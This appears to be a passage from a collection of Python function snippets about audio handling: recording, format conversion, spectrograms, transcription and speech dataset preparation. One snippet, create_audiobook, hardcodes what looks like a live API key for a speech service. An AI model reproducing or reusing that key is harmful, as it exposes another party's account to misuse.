seconds of audio.\" % (secs, len(audio) / sr)) \n audio = audio[0:total_samples]\n\n self.audio = audio\n self.sampling_rate = sr", "def direct_record(file_name,\n time,\n chunk = 1024,\n sample_rate = 44100,\n format = pyaudio.paInt16,\n channel = 1):\n\n p = pyaudio.PyAudio()\n\n stream = p.open(format = format,\n channels = channel,\n rate = sample_rate,\n input = True,\n frames_per_buffer = chunk)\n\n frames = []\n\n for i in range(0, int(sample_rate / chunk * time)):\n data = stream.read(chunk)\n frames.append(data)\n\n stream.stop_stream()\n stream.close()\n p.terminate()\n\n data_file = open(file_name, 'wb', chunk)\n data_file.write(b''.join(frames))\n data_file.close()", "def save_arrays_with_labels(audio_path, annotation_dict, csv_dir):\n y, sr = librosa.load(audio_path)\n for key, value in annotation_dict.items():\n key_start, key_end = key.split(\",\")\n key_start = (int)(key_start)\n key_end = (int)(key_end)\n segment_start = (int)((key_start/1000) * sr)\n segment_end = (int)((key_end/1000) * sr)\n wav_segment = y[segment_start:segment_end]\n fname = os.path.join(csv_dir, path_leaf(audio_path))[:-4] + \"_\" + key + \".csv\"\n arr = np.append(wav_segment, value)\n np.savetxt(fname, arr, delimiter=\",\")", "def transcribe(self, paths2audio_files: List[str], batch_size: int = 4) -> List[str]:\n pass", "def remix(self):\n self.original = audio.LocalAudioFile(self.infile)\n #for i, segment in enumerate(self.original.analysis.segments):\n # segment.encode(\"seg_%s.mp3\" % i)\n print \"\\n\\n\\n\"\n loudnesses = [x.timbre[0] for i, x in enumerate(self.original.analysis.segments)]\n brightnesses = [x.timbre[1] for i, x in enumerate(self.original.analysis.segments)]\n flatnesses = [x.timbre[2] for i, x in enumerate(self.original.analysis.segments)]\n attacks = [x.timbre[3] for i, x in enumerate(self.original.analysis.segments)]\n timbre5 = [x.timbre[4] for i, x in enumerate(self.original.analysis.segments)]\n timbre6 = [x.timbre[5] for i, x in enumerate(self.original.analysis.segments)]\n timbre7 = [x.timbre[6] for i, x in enumerate(self.original.analysis.segments)]\n timbre8 = [x.timbre[7] for i, x in enumerate(self.original.analysis.segments)]\n timbre9 = [x.timbre[8] for i, x in enumerate(self.original.analysis.segments)]\n timbre10 = [x.timbre[9] for i, x in enumerate(self.original.analysis.segments)]\n timbre11 = [x.timbre[10] for i, x in enumerate(self.original.analysis.segments)]\n timbre12 = [x.timbre[11] for i, x in enumerate(self.original.analysis.segments)]\n\n print \"AVERAGES\"\n print \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % ('loud','bright','flat','attack','t5','t6','t7','t8','t9','t10','t11','t12')\n print \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (avg(loudnesses),avg(brightnesses),avg(flatnesses),avg(attacks),avg(timbre5),avg(timbre6),avg(timbre7),avg(timbre8),avg(timbre9),avg(timbre10),avg(timbre11),avg(timbre12))\n print\n print \"STDVS\"\n print \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % ('loud','bright','flat','attack','t5','t6','t7','t8','t9','t10','t11','t12')\n print \"%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (stddev(loudnesses),stddev(brightnesses),stddev(flatnesses),stddev(attacks),stddev(timbre5),stddev(timbre6),stddev(timbre7),stddev(timbre8),stddev(timbre9),stddev(timbre10),stddev(timbre11),stddev(timbre12))\n\n\n print \"\\tLoud\\tBright\\tFlat\\tAttack\\ttim5\\ttim6\\ttim7\\ttim8\\ttim9\\ttim10\\ttim11\\ttim12\"\n for segment in self.original.analysis.segments:\n if are_kicks(segment): print \"Kick\",\n elif are_snares(segment): print \"Snar\",\n elif are_hats(segment): print \"Hats\",\n else: print \"else\",\n print \"\\t%s\\t%s\\t%s\\t%s\\t%s\" % (segment.timbre[0], segment.timbre[1], segment.timbre[2], segment.timbre[3], segment.timbre[4])\n\n kicks = self.original.analysis.segments.that(are_kicks)\n #if kicks: kicks.encode('kicks.mp3')\n snares = self.original.analysis.segments.that(are_snares)\n #if snares: snares.encode('snares.mp3')\n hats = self.original.analysis.segments.that(are_hats)\n #if hats: hats.encode('hats.mp3')\n\n # Time to replace\n hat_sample = audio.AudioData(self.sample_path + self.template['hats'], sampleRate=44100, numChannels=2, verbose=False)\n kick_sample = audio.AudioData(self.sample_path + self.template['kick'], sampleRate=44100, numChannels=2, verbose=False)\n snare_sample = audio.AudioData(self.sample_path + self.template['snare'], sampleRate=44100, numChannels=2, verbose=False)\n \n empty = audio.AudioData(ndarray=numpy.zeros(((self.original.sampleRate * self.original.analysis.duration), 2), dtype=numpy.int16), numChannels=2, sampleRate=44100)\n\n last = 0\n for segment in kicks:\n if last + len(kick_sample.data) > segment.start:\n print \"Adding kick at %s\" % segment.start\n empty.data[self.original.sampleRate*segment.start:self.original.sampleRate*segment.start + len(kick_sample.data)] += kick_sample.data\n last = segment.start\n\n last = 0\n for segment in snares:\n if last + len(snare_sample.data) > segment.start:\n print \"Adding snare at %s\" % segment.start\n empty.data[self.original.sampleRate*segment.start:self.original.sampleRate*segment.start + len(snare_sample.data)] += snare_sample.data \n last = segment.start\n for segment in hats:\n if last + len(hat_sample.data) > segment.start:\n print \"Adding hat at %s\" % segment.start\n empty.data[self.original.sampleRate*segment.start:self.original.sampleRate*segment.start + len(hat_sample.data)] += hat_sample.data\n last = segment.start\n\n audio.mix(empty, self.original, 0.5).encode('mixed.mp3')", "def write_audio_to_file(audio: torch.Tensor, sample_id: str = ''):\n global FS_HZ\n assert FS_HZ is not None\n audio_extension = '.wav'\n audio_path = upload_directory + 'sample' + sample_id + audio_extension\n audio_np = audio.cpu().numpy()\n with open(audio_path, 'wb') as f:\n soundfile.write(f,\n audio_np,\n samplerate=FS_HZ)\n return audio_path", "def to_voice(item):\r\n item.seek(0)\r\n item = AudioSegment.from_file(item)\r\n m = io.BytesIO()\r\n m.name = \"voice.ogg\"\r\n item.split_to_mono()\r\n dur = len(item) / 1000\r\n item.export(m, format=\"ogg\", bitrate=\"64k\", codec=\"libopus\")\r\n m.seek(0)\r\n return m, dur", "def output_beat_to_file(file_name, e):\n print(\"Writing to file:\", file_name)\n routine = gp.compile(e,pset)\n with open(file_name+\".raw\",'w') as f:\n for t in range(200000):\n f.write(chr(int(routine(t+1))%256))\n # Now convert to wav\n subprocess.call(SOX_COMMAND + \" \" + file_name + \".raw\" + \" \" + file_name + \".wav\", shell=True)\n subprocess.call(LAME_COMMAND + \" \" + file_name + \".wav\", shell=True)", "def store_samples(self, directory, preprocess_fnc):\n print('Called with', directory)\n out_directory = self._get_directory(preprocess_fnc, directory)\n print('Outdir', out_directory)\n if not os.path.exists(out_directory):\n os.makedirs(out_directory)\n\n print('scanning', os.path.join(self._data_directory, directory))\n\n audio_files = list(iglob_recursive(os.path.join(self._data_directory, directory), '*.flac'))\n print('audio files:', len(audio_files), 'from', os.path.join(self._data_directory, directory))\n with Pool(processes=multiprocessing.cpu_count()) as pool:\n transcript_dict = self._transcript_dict\n\n for audio_file in audio_files:\n audio_id = self._extract_audio_id(audio_file)\n transcript_entry = transcript_dict[audio_id]\n transform_args = (audio_file, preprocess_fnc, transcript_entry, out_directory)\n pool.apply_async(SpeechCorpusReader._transform_and_store_sample, transform_args)\n\n pool.close()\n pool.join()", "def start(scale, entry, label, v):\r\n\r\n # The following variables are common across all the 5 different voices selected and so, will only be changed there for space considerations\r\n CHANNELS = 1\r\n RATE = 8000\r\n DURATION = 0\r\n WIDTH = 2\r\n BLOCKLEN = 1024\r\n\r\n if len(\r\n entry.get()) == 0: # can try and get rid of invalid characters when saving file too but that won't be necessary\r\n label['text'] = 'File name cannot be empty!'\r\n else:\r\n DURATION = scale.get()\r\n output_wavfile = entry.get()\r\n\r\n label['text'] = 'You will be recording for ' + str(DURATION) + ' seconds.'\r\n\r\n if v.get() == 1:\r\n voice1(output_wavfile, DURATION, BLOCKLEN, RATE, WIDTH, CHANNELS)\r\n print(\"1\")\r\n elif v.get() == 2:\r\n voice2(output_wavfile, DURATION, BLOCKLEN, RATE, WIDTH, CHANNELS)\r\n print(\"2\")\r\n elif v.get() == 3:\r\n voice3(output_wavfile, DURATION, BLOCKLEN, RATE, WIDTH, CHANNELS)\r\n print(\"3. Roger, roger!\")\r\n elif v.get() == 4:\r\n voice4(output_wavfile, DURATION, RATE, WIDTH, CHANNELS)\r\n print(\"4\")\r\n elif v.get() == 5:\r\n manualControl(output_wavfile, DURATION, BLOCKLEN, RATE, WIDTH, CHANNELS)\r\n print(\"5\")\r\n\r\n # after whatever operation we do\r\n label['text'] = 'Successfully saved ' + output_wavfile + '.wav file'\r\n\r\n pass", "def split_diphones(wav_path, outdir=None):\n tg = ml.parsing.textgrid_reader.read(textgrid_path(wav_path))\n word = os.path.splitext(os.path.basename(wav_path))[0]\n\n wav_dir = os.path.dirname(wav_path)\n diphones_dir = os.path.join(wav_dir, \"diphones\")\n\n if not os.path.exists(diphones_dir):\n os.mkdir(diphones_dir)\n\n wav = AudioSegment.from_file(wav_path)\n for (begin, end, diphone) in tg[u'phones']:\n diphone = diphone.strip().replace(\"-\", \"_\")\n if len(diphone) > 0 and diphone[0] != \".\":\n diphone_file = \"{}_{}.wav\".format(diphone, word)\n diphone_path = os.path.join(diphones_dir, diphone_file)\n\n # Works in milliseconds\n segment = wav[(begin * 1000):(end * 1000)]\n print(\"Saving {} ({} - {})\".format(diphone_path, begin, end))\n segment.export(diphone_path, format=\"wav\")\n elif diphone[0] == \".\":\n print(\"skipping {}\".format(diphone))", "def load_audio(file_path):\n # load the audio file in its original sampling rate\n audio_data, sr = librosa.load(file_path, sr=sampling_rate)\n\n # get the common file name\n file_name = file_path.split(\"/\")[-1]\n file_name = file_name.split(\".wav\")[0]\n\n # calculate number of samples in the time duration needed\n num_samples = int(sr*time_duration)\n\n # get the cut-off audio signals and save them\n for i in np.arange(num_audio_files):\n audio_cut_data = cut_sample(audio_data, num_samples)\n file_path=dir_to_save + file_name + \"_\" + str(i+1) + \".wav\"\n save_sample(audio_cut_data, file_path, sr)\n print(f\"generating signal {str(i)}, its length {len(audio_cut_data)} by cutting the original signal\")", "def prepare_voicebank(\r\n data_folder, save_folder, valid_speaker_count=2, skip_prep=False\r\n):\r\n\r\n if skip_prep:\r\n return\r\n\r\n # Setting ouput files\r\n save_json_train = os.path.join(save_folder, TRAIN_JSON)\r\n save_json_valid = os.path.join(save_folder, VALID_JSON)\r\n save_json_test = os.path.join(save_folder, TEST_JSON)\r\n\r\n # Check if this phase is already done (if so, skip it)\r\n if skip(save_json_train, save_json_test, save_json_valid):\r\n logger.info(\"Preparation completed in previous run, skipping.\")\r\n return\r\n\r\n train_clean_folder = os.path.join(\r\n data_folder, \"clean_trainset_28spk_wav_16k\"\r\n )\r\n train_noisy_folder = os.path.join(\r\n data_folder, \"noisy_trainset_28spk_wav_16k\"\r\n )\r\n train_txts = os.path.join(data_folder, \"trainset_28spk_txt\")\r\n test_clean_folder = os.path.join(data_folder, \"clean_testset_wav_16k\")\r\n test_noisy_folder = os.path.join(data_folder, \"noisy_testset_wav_16k\")\r\n test_txts = os.path.join(data_folder, \"testset_txt\")\r\n\r\n # Setting the save folder\r\n if not os.path.exists(save_folder):\r\n os.makedirs(save_folder)\r\n\r\n # Additional checks to make sure the data folder contains Voicebank\r\n check_voicebank_folders(\r\n train_clean_folder,\r\n train_noisy_folder,\r\n train_txts,\r\n test_clean_folder,\r\n test_noisy_folder,\r\n test_txts,\r\n )\r\n\r\n logger.debug(\"Creating lexicon...\")\r\n lexicon = create_lexicon(os.path.join(data_folder, \"lexicon.txt\"))\r\n logger.info(\"Creating json files for noisy VoiceBank...\")\r\n\r\n logger.debug(\"Collecting files...\")\r\n extension = [\".wav\"]\r\n valid_speakers = TRAIN_SPEAKERS[:valid_speaker_count]\r\n wav_lst_train = get_all_files(\r\n train_noisy_folder, match_and=extension, exclude_or=valid_speakers,\r\n )\r\n wav_lst_valid = get_all_files(\r\n train_noisy_folder, match_and=extension, match_or=valid_speakers,\r\n )\r\n wav_lst_test = get_all_files(test_noisy_folder, match_and=extension)\r\n\r\n logger.debug(\"Creating json files for noisy VoiceBank...\")\r\n create_json(\r\n wav_lst_train, save_json_train, train_clean_folder, train_txts, lexicon\r\n )\r\n create_json(\r\n wav_lst_valid, save_json_valid, train_clean_folder, train_txts, lexicon\r\n )\r\n create_json(\r\n wav_lst_test, save_json_test, test_clean_folder, test_txts, lexicon\r\n )", "def write(f, sr, x, normalized=False):\n channels = 2 if (x.ndim == 2 and x.shape[1] == 2) else 1\n if normalized: # normalized array - each item should be a float in [-1, 1)\n y = np.int16(x * 2 ** 15)\n else:\n y = np.int16(x)\n song = pydub.AudioSegment(y.tobytes(), frame_rate=sr, sample_width=2, channels=channels)\n song.export(f, format=\"mp3\", bitrate=\"64k\")", "def transcribe_audio_to_tsv_with_diarization(input_audio_paths,\n output_tsv_path,\n sample_rate,\n language_code,\n speaker_count,\n begin_sec=0.0):\n client = speech.SpeechClient()\n enable_speaker_diarization = speaker_count > 0\n config = speech.RecognitionConfig(\n encoding=speech.RecognitionConfig.AudioEncoding.LINEAR16,\n sample_rate_hertz=sample_rate,\n audio_channel_count=1,\n enable_separate_recognition_per_channel=False,\n language_code=language_code,\n enable_speaker_diarization=enable_speaker_diarization,\n diarization_speaker_count=speaker_count)\n streaming_config = speech.StreamingRecognitionConfig(\n config=config, interim_results=False)\n requests = audio_data_generator(input_audio_paths, config)\n responses = client.streaming_recognize(streaming_config, requests)\n\n with open(output_tsv_path, \"w\" if not begin_sec else \"a\") as f:\n if not begin_sec:\n # Write the TSV header.\n f.write(tsv_data.HEADER + \"\\n\")\n utterances = []\n for response in responses:\n if not response.results:\n continue\n results = [result for result in response.results if result.is_final]\n max_confidence = -1\n best_transcript = None\n result_end_time = None\n for result in results:\n for alt in result.alternatives:\n if alt.confidence > max_confidence:\n max_confidence = alt.confidence\n best_transcript = alt.transcript.strip()\n diarized_words = [(\n word.word, word.speaker_tag, word.start_time.total_seconds(),\n word.end_time.total_seconds()) for word in alt.words]\n result_end_time = result.result_end_time\n if not best_transcript:\n continue\n end_time_sec = result_end_time.total_seconds()\n utterances.append(best_transcript)\n\n regrouped_utterances = regroup_utterances(utterances, diarized_words)\n utterance_counter = 0\n for (regrouped_utterance,\n speaker_index, start_time_sec, end_time_sec) in regrouped_utterances:\n utterance_counter += 1\n line = \"%.3f\\t%.3f\\t%s\\t%s [U%d] [Speaker #%d]\" % (\n start_time_sec + begin_sec,\n end_time_sec + begin_sec,\n tsv_data.SPEECH_TRANSCRIPT_TIER,\n regrouped_utterance,\n utterance_counter,\n speaker_index)\n print(line)\n f.write(line + \"\\n\")", "def create_spectrogram(sound_file, X, y):\n spec_file = sound_file.split(\"/\")[-1].split(\".\")[0] + \"_X\" + X + \"_y\" + y + \".png\"\n \n sound = AudioSegment.from_wav(sound_file)\n if len(sound)*(int(X)/1000) <= PIXEL_LIMIT: # max pixel limit\n command = \"sox \"+ sound_file + \" -n spectrogram -l -r -m -y \" + y + \" -X \" + X + \" -o \" + spec_file\n subprocess.call(command.split())\n return spec_file\n\n # If large file segment into chunks of smaller spectrogram and concatenate later\n chunk_size = int((PIXEL_LIMIT/int(X))*1000)\n start, stop = 0, chunk_size\n\n # Temporary folders to store temporary data in\n os.makedirs(\"sound_chunks\")\n os.makedirs(\"spec_chunks\")\n \n chunk_files = []\n chopping = True\n while chopping:\n if stop > len(sound):\n stop = len(sound)\n chopping = False\n\n # Create sound chop\n chunk_file = \"chunk\" + str(start) + \"-\" + str(stop)\n sound_chunk = sound[start:stop]\n sound_chunk.export(\"sound_chunks/\" + chunk_file + \".wav\", format=\"wav\")\n \n # Create spectrogram chop\n command = \"sox sound_chunks/\" + chunk_file + \".wav -n spectrogram -l -r -m -y \" + y + \" -X \" + X + \" -o spec_chunks/\" + chunk_file + \".png\"\n subprocess.call(command.split())\n\n # Remember filenames for concatenation later\n chunk_files.append(\"spec_chunks/\" + chunk_file + \".png\")\n start += chunk_size\n stop += chunk_size\n\n # Concatenate spectrograms into a big one\n cat_command = \"convert \"\n for chunk_file in chunk_files:\n cat_command+= chunk_file + \" \"\n cat_command += \"+append \" + spec_file\n subprocess.call(cat_command.split())\n shutil.rmtree(\"sound_chunks\")\n shutil.rmtree(\"spec_chunks\")\n return spec_file", "def normalize_audio(audio_path: str, output_path: str, name: str):\n sound = AudioSegment.from_file(audio_path + os.sep + name + '.wav',\n \"wav\")\n change_in_d_bfs = (-20.0) - sound.dBFS\n sound = sound.apply_gain(change_in_d_bfs)\n sound.export(output_path + os.sep + name + '.wav', format=\"wav\")", "def create_audiobook():\n\n f = open(\"static/files/book.txt\", \"r\", encoding=\"utf-8\")\n summary = f.read()\n print('total chars: ', len(summary))\n all_words = summary.split('.')\n aflr.api_key = \"b6b1434676d14bdfbf9f50ca2157ed5c\"\n VOICE=\"Matthew\"\n current, total_chars, chunk_num, TEXT = 0,0,0,[]\n while current < len(all_words) - 1:\n while total_chars <= 4999:\n TEXT.append(all_words[current])\n total_chars += len(all_words[current]) + 1\n current += 1\n if current == len(all_words):\n break\n \n if current < len(all_words):\n TEXT.pop()\n current -= 1\n total_chars = 0\n\n TEXT = \".\".join(TEXT)\n\n SPEED=80\n script = aflr.Script().create(\n scriptText=TEXT,\n projectName=\"may_the_4th\",\n moduleName=\"evil\",\n scriptName=f\"{chunk_num}_evil_{VOICE}\",\n )\n print(f\"Connect to the dev star: \\n {script} \\n\")\n\n scriptId = script[\"scriptId\"]\n\n response = aflr.Speech().create(\n scriptId=scriptId, voice=VOICE, speed=SPEED, #effect=EFFECT\n )\n # print(f\"Response from dev star: \\n {response} \\n\")\n # mastering current\n response = aflr.Mastering().create(\n scriptId=scriptId, #backgroundTrackId=BACKGROUNDTRACK\n )\n # print(f\"Using the force: \\n {response} \\n\")\n\n url = aflr.Mastering().retrieve(scriptId=scriptId)\n #print(f\"url to download the track: \\n {url} \\n\")\n\n # or download\n file = aflr.Mastering().download(\n scriptId=scriptId, destination=MINI_PATH\n )\n # print(f\"Listen to the results of the force: \\n {file} \\n\")\n\n print(\"finished\",chunk_num)\n\n TEXT = []\n chunk_num += 1\n\n play_audio()", "def dumpRecording(self, files):\n for tone, f in zip(self.tones, files):\n tone.dump_to_file(f)", "def write_data(infbfile,begin_N,dur_N,outfbfile):\n infbfile.seek_to_sample(begin_N)\n for i in range(begin_N,(begin_N+dur_N)):\n data = infbfile.read_sample()\n data.tofile(outfbfile)", "def save(stream, filename, path, sampling_rate=None, chunk_size=None):\n if chunk_size == None:\n chunk_size = stream.chunk_size\n\n if sampling_rate == None:\n raise Exception(\"You must specify the sampling rate in ArfStreamer.save\")\n \n with arf.open_file(filename, 'a') as file:\n path = path.split(\"/\")\n dst_name = path[-1]\n grp_path = \"/\".join(path[:-1])\n grp = file.require_group(grp_path) \n #Get first batch of data\n data = stream.read(chunk_size)\n try:\n dst = arf.create_dataset(grp, dst_name, data,\n maxshape=(None,), sampling_rate=sampling_rate)\n except:\n raise ValueError('Error, maybe dataset with that name already exists')\n while True:\n data = stream.read(chunk_size)\n if len(data) == 0:\n break\n arf.append_data(dst, data)\n file.flush()", "def save_face_track_files(self):\r\n\r\n # Check existence of tracking results\r\n if len(self.tracked_faces) == 0:\r\n\r\n # Try to load YAML file\r\n if os.path.exists(self.track_file_path):\r\n\r\n print 'Loading YAML file with tracking results'\r\n\r\n with open(self.track_file_path) as f:\r\n\r\n self.tracked_faces = yaml.load(f)\r\n\r\n print 'YAML file with tracking results loaded'\r\n\r\n else:\r\n\r\n print 'Warning! No tracking results found!'\r\n\r\n return\r\n\r\n # Delete already saved files\r\n if os.path.exists(self.compl_ann_path):\r\n\r\n ann_files = os.listdir(self.compl_ann_path)\r\n\r\n for ann_file in ann_files:\r\n ann_file_path = os.path.join(self.compl_ann_path, ann_file)\r\n os.remove(ann_file_path)\r\n\r\n else:\r\n\r\n os.makedirs(self.compl_ann_path)\r\n\r\n # Delete already saved files\r\n if os.path.exists(self.simple_ann_path):\r\n\r\n ann_files = os.listdir(self.simple_ann_path)\r\n\r\n for ann_file in ann_files:\r\n ann_file_path = os.path.join(self.simple_ann_path, ann_file)\r\n os.remove(ann_file_path)\r\n\r\n else:\r\n\r\n os.makedirs(self.simple_ann_path)\r\n\r\n # Get minimum segment duration\r\n min_duration = c.MIN_SEGMENT_DURATION\r\n\r\n if ((self.params is not None) and\r\n (c.MIN_SEGMENT_DURATION_KEY in self.params)):\r\n min_duration = self.params[c.MIN_SEGMENT_DURATION_KEY]\r\n\r\n # Save unique tags\r\n tags = []\r\n\r\n for segment_dict in self.tracked_faces:\r\n\r\n ann_tag = segment_dict[c.ANN_TAG_KEY]\r\n\r\n if (ann_tag != c.UNDEFINED_TAG) and (ann_tag not in tags):\r\n tags.append(ann_tag)\r\n\r\n for tag in tags:\r\n\r\n # Create complete annotations\r\n person_dict = {}\r\n\r\n # Create simple annotations\r\n simple_dict = {c.ANN_TAG_KEY: tag}\r\n\r\n person_dict[c.ANN_TAG_KEY] = tag\r\n\r\n segment_list = []\r\n\r\n simple_segment_list = []\r\n\r\n tot_dur = 0\r\n\r\n # Iterate through all tracked faces in video\r\n for segment_dict in self.tracked_faces:\r\n\r\n ann_tag = segment_dict[c.ANN_TAG_KEY]\r\n\r\n if ann_tag == tag:\r\n\r\n segment_list.append(segment_dict)\r\n\r\n simple_seg_dict = {}\r\n\r\n start = segment_dict[c.SEGMENT_START_KEY]\r\n\r\n simple_seg_dict[c.SEGMENT_START_KEY] = start\r\n\r\n dur = segment_dict[c.SEGMENT_DURATION_KEY]\r\n\r\n tot_dur = tot_dur + dur\r\n\r\n simple_seg_dict[c.SEGMENT_DURATION_KEY] = dur\r\n\r\n simple_segment_list.append(simple_seg_dict)\r\n\r\n person_dict[c.SEGMENTS_KEY] = segment_list\r\n\r\n simple_dict[c.SEGMENTS_KEY] = simple_segment_list\r\n\r\n person_dict[c.TOT_SEGMENT_DURATION_KEY] = tot_dur\r\n\r\n simple_dict[c.TOT_SEGMENT_DURATION_KEY] = tot_dur\r\n\r\n file_name = tag + '.YAML'\r\n\r\n # Save complete annotations\r\n\r\n file_path = os.path.join(self.compl_ann_path, file_name)\r\n\r\n utils.save_YAML_file(file_path, person_dict)\r\n\r\n # Save simple annotations\r\n\r\n file_path = os.path.join(self.simple_ann_path, file_name)\r\n\r\n utils.save_YAML_file(file_path, simple_dict)", "def quicksavefile(directory, text, format=\".out\"):\n print(text)\n print(directory)\n directory = directory.split(\".\")\n del directory[-1]\n directory.append(format)\n s = \"\".join(directory)\n file = open(s, \"w\")\n file.write(text)\n file.close()", "def generate_seg_file(self, set_speakers=True):\n result = ''\n for clu in self._clusters:\n result += self._clusters[clu]._get_seg_repr(set_speakers)\n f_seg = open(self.get_file_basename() + '.seg', 'w')\n f_seg.write(result)\n f_seg.close()", "def get_audio(name, n):\n audio_path = os.path.join(args.input_folder, name, \"audio.ogg\")\n if not os.path.exists(audio_path):\n ## Some folders have multiple .ogg files, so we need to first combine them into one file. Example:\n ## |── Universe\n ##  │   ├── aligned.swc\n ##  │   ├── audio1.ogg\n ##  │   ├── audio2.ogg\n ##  │   ├── audio3.ogg\n ##  │   ├── audio4.ogg\n ##  │   ├── audiometa.txt\n ##  │   ├── info.json\n ##  │   ├── wiki.html\n ##  │   ├── wiki.txt\n ##  │   └── wiki.xml\n\n multiple_ogg_files = []\n for i in range(1, 5):\n path = os.path.join(args.input_folder, name, \"audio\" + str(i) + \".ogg\")\n if os.path.exists(path):\n multiple_ogg_files.append(path)\n else:\n break\n if len(multiple_ogg_files) == 0:\n return\n elif len(multiple_ogg_files) == 1:\n os.system(\"cp \\\"\" + multiple_ogg_files[0] + \"\\\" \\\"\" + audio_path + \"\\\"\")\n else:\n tmp_file_name = \"ffmeg_inputs.txt\"\n print(\"tmp_file_name=\", tmp_file_name)\n with open(tmp_file_name, \"w\", encoding=\"utf-8\") as tmp_file:\n for path in multiple_ogg_files:\n tmp_file.write(\"file '\" + path + \"'\\n\")\n cmd = \"ffmpeg -f concat -i \\\"\" + tmp_file_name + \"\\\" -c copy \\\"\" + audio_path + \"\\\"\"\n print(cmd)\n os.system(cmd)\n\n output_audio_path = args.destination_folder + \"/audio/\" + str(n) + \".ogg\"\n os.system(\"cp \\\"\" + audio_path + \"\\\" \" + output_audio_path)", "def record(options):\n signal = audio.record(rate=22050, secs=options.secs,\n store=True, opath=options.opath)\n if options.plot:\n plotter.plot(**{options.opath: signal.data})", "def save(self, filename):\n target = open(filename, 'w')\n target.write(\"\\\\data\\\\\\n\")\n target.write(\"ngram 1=\" + str(len(self.f1)) + \"\\n\\n\")\n target.write(\"\\\\1-grams:\\n\")\n for w,p in sorted(self.f1.items()): \n target.write(str(p) + \" \" + w + \"\\n\")\n target.write(\"\\\\end\\\\\\n\")\n target.close()", "def save_wav(file_name, signal, fs):\n wavfile.write(file_name, fs, np.int16(signal/np.max(np.abs(signal)) * (2**(16)/2-1)))", "def build_transcript(speaker_label_transcript):\n with open('main_transcript.txt', 'a') as the_file:\n for t in speaker_label_transcript:\n the_file.write(f\"{t['speaker']}:\\n\")\n the_file.write(f\"{t['content']}\\n\\n\")", "def transcribe(self, segment) -> str:\n segment_as_wav = segment.export(format=\"wav\")\n with wave.open(segment_as_wav, 'r') as w:\n frames = w.getnframes()\n buffer = w.readframes(frames)\n data = np.frombuffer(buffer, dtype=np.int16)\n\n return self.ds.stt(data)", "def read_mastcam_dir(self, filepath, suffix, unit, feature, extension = '.IMG', lblext='.LBL_label', eye='LR', margin=6):\n \n if eye == 'L':\n eyez = 'ML'\n elif eye == 'R':\n eyez = 'MR'\n elif eye == 'LR':\n eyez = ''\n pass\n else:\n raise ValueError('Eye name %s is not valid! Use L, R, or LR.' % eye)\n \n # GET ALL FILES WITH GIVEN EXTENSION IN FILEPATH\n files = sorted(glob.glob(str(filepath) + \"*\" + eyez + \"*\" + str(suffix) + \"*\" + str(extension)))\n fileprefixes = sorted(list(set([f.split('/')[-1][0:12] for f in files])))\n print(fileprefixes)\n \n print(\"found %d files among %d sequences with eye %s and extension %s in %s:\" % (len(files), len(fileprefixes), eye, extension, filepath))\n assert len(files) > 0\n \n numfiles = len(fileprefixes)\n seen = 0\n percent = 0.0\n printed = [False for foo in range(1000)]\n \n fullimages = {}\n segmentation = {}\n\n data = []\n self.labels = []\n \n for fileprefix in fileprefixes:\n print(\" \" + fileprefix)\n \n thissequence = sorted(glob.glob(str(filepath) + fileprefix + \"*\" + str(suffix) + \"*\" + str(extension)))\n asdfghjkl = 0\n \n parser = Parser()\n seqfiltstr = \"\"\n dimlist = []\n for w in thissequence:\n labels = parser.parse(open_pds(w.replace(extension, lblext))) \n filt = labels['INSTRUMENT_STATE_PARMS']['FILTER_NAME'][9]\n seqfiltstr += filt\n h = int(labels['IMAGE']['LINES'])\n w = int(labels['IMAGE']['LINE_SAMPLES'])\n dimlist.append([h, w])\n #print(\" %s %s %s\" % (filt, h, w))\n\n print(\"Filter name:\", labels['INSTRUMENT_STATE_PARMS']['FILTER_NAME'])\n \n #print(seqfiltstr)\n # print(dimlist)\n seqstocombine = []\n \n # Handle cases which appear to be several series of observations\n if len(seqfiltstr) % 7 == 0:\n for i in range(len(seqfiltstr) // 7):\n subseq = thissequence[7*i:7*i+7]\n subseqfilt = seqfiltstr[7*i:7*i+7]\n if subseqfilt == '0123456':\n cont = False\n for j in range(7*i, 7*i+7):\n if dimlist[7*i] != dimlist[j]:\n print(\"SIZE ERROR\")\n cont = True\n if cont:\n continue\n \n seqstocombine.append(subseq)\n \n else:\n if seqfiltstr == '00112233445566':\n seq1 = [thissequence[2*i] for i in range(len(thissequence) // 2)]\n seq2 = [thissequence[2*i+1] for i in range(len(thissequence) // 2)]\n \n seqstocombine.append(seq1)\n seqstocombine.append(seq2)\n \n break\n else:\n print(\"Length multiple of 7 but bad sequence\")\n\n # Non-7 number of observations\n else:\n for i in range(len(seqfiltstr)):\n subseq = thissequence[i:i+7]\n subseqfilt = seqfiltstr[i:i+7]\n if subseqfilt == '0123456':\n cont = False\n for j in range(i, i+7):\n if dimlist[i] != dimlist[j]:\n print(\"SIZE ERROR\")\n cont = True\n if cont: continue\n \n seqstocombine.append(subseq)\n \n # No actual multispectral images exist, so use all RGB (sol 388)\n if len(seqstocombine) == 0 and 'sol388' in self.archive:\n seqstocombine = [[f] for f in thissequence]\n \n # Now, download each sequence with this prefix\n for subseq in seqstocombine:\n qwertyuiop = 0\n bigimage = None\n \n err = False\n # Get each image within sequence\n for filename in subseq:\n namestem = filename.split('.')[0].split('/')[-1]\n\n try:\n (image, lbls) = self.load_image(namestem, filepath, ext=extension, lblext=lblext)\n except ValueError as e:\n #print(\"An error happened while processing %s\" % filename)\n err = True\n break\n\n (h, w, b) = image.shape\n \n if b == 3:\n self.rgbdict[fileprefix + str(asdfghjkl)] = namestem\n fullimages[fileprefix + str(asdfghjkl)] = image\n #print(\"Stored %s to rgbdict\" % (fileprefix + str(asdfghjkl)))\n \n if bigimage == None and 'sol388' not in filepath:\n bigimage = np.zeros([h, w, 9], dtype='uint8')\n elif bigimage == None:\n bigimage = np.zeros([h, w, b], dtype='uint8')\n \n bigimage[:,:,qwertyuiop:qwertyuiop+b] = image\n\n qwertyuiop += b\n \n\n # Reorder images based on camera so filters are ordered\n if eye in ['L', 'R']:\n bi = np.zeros([h, w, 9], dtype='uint8')\n if eye == 'L':\n bi[:, :, 0] = bigimage[:, :, 0]\n bi[:, :, 1] = bigimage[:, :, 1]\n bi[:, :, 2] = bigimage[:, :, 2]\n bi[:, 